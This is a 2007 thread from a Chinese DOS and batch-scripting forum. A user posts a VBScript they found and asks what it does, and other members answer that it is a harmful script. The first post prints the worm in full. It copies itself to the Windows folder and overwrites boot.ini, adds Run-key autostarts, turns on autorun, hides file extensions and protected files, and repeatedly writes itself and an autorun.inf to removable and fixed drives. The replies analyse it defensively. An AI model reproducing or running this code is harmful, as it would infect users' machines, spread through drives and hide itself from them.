![]() |
中国DOS联盟-- 联合DOS 推动DOS 发展DOS --联盟域名:www.cn-dos.net 论坛域名:www.cn-dos.net/forum |
| 游客 | 登录 | 注册 | 会员 | 搜索 | 中国DOS联盟 |
|
中国DOS联盟论坛 现在时间是 2026-08-06 14:16 |
共 48,039 主题排行 / 350,124 发帖 / 今日 0 篇 / 48,251 会员排行 |
| DOS批处理 & 脚本技术(批处理室) » 同志们进来看下这个VBS有什么作用 |
| 可打印版本 809 / 4 |
| 第1楼 dos9527 | 发表于 2007-11-21 15:47 |
| 中级用户 发帖 56 积分 252 | |
|
同志们进来看下这个VBS有什么作用 'marker
'slow and silent (sas)1.0 on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm atr = ""&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs" set fs = createobject("Scripting.FileSystemObject") set mf = fs.getfile(Wscript.ScriptFullname) set rg = createobject("WScript.Shell") rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0" rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs" rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1" dim text,size size = mf.size set text=mf.openastextstream(1,-2) cc = text.readline do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs") tf.attributes = 32 set tf=fs.createtextfile(winpath & "\.MS32DLL.dll.vbs",2,true) tf.write "'ker"&vbcrlf&mysource tf.close set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs") tf.attributes = 39 Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & "\boot.ini") tf.attributes = 32 set tf=fs.createtextfile(winpath & "\boot.ini",2,true) tf.write "'ker"&vbcrlf&mysource tf.close set tf = fs.getfile(winpath & "\boot.ini") tf.attributes = 39 if cc = "'mark" then rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname end if if cc = "'marker" then rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname end if do for each flashdrive in fs.drives hm="'mark" If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then if(flashdrive.drivetype=2) then hm = "'marker" end if set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs") tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &"\.MS32DLL.dll.vbs",2,true) tf.write hm&vbcrlf&mysource tf.close set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs") tf.attributes =39 set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 end if rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0" rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs" rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1" next if cc <> "'mark" then Wscript.sleep 10000 end if loop while cc <> "'mark" 还有为什么文件全名用”.MS32DLL.dll.vbs“,是前面那个点有什么作用。 [ Last edited by dos9527 on 2007-11-21 at 04:02 PM ] |
|
| 第2楼 dos9527 | 发表于 2007-11-21 16:17 |
| 中级用户 发帖 56 积分 252 | |
|
自己顶
|
|
| 第3楼 scriptor | 发表于 2007-11-21 18:02 |
| 银牌会员 发帖 555 积分 1,187 | |
Originally posted by dos9527 at 2007-11-21 15:47: 我 ft~~~ 明显一个有害的脚本~~ 1: 添加自启动 2: 隐藏文件类型 3: 无法显示隐藏等属性的文件 4: 控制磁盘使其能自运行 5: 改写boot.ini 6: vbs进程还不能杀掉 ... |
|
| 第4楼 dos9527 | 发表于 2007-11-21 20:59 |
| 中级用户 发帖 56 积分 252 | |
|
有没有盗号的可能,我是玩网游的,我怕被盗号
|
|
| 第5楼 hlowd | 发表于 2007-11-21 21:28 |
| 初级用户 发帖 29 积分 65 | |
|
应该病毒的其中一部分,没看见盗号的代码,但是有这东西总是不爽.....
|
|
|
[ 联系联盟系统管理团队 -
中国DOS联盟 -
标准版 ] Sponsored by ifanr Inc | © 2001–2023 |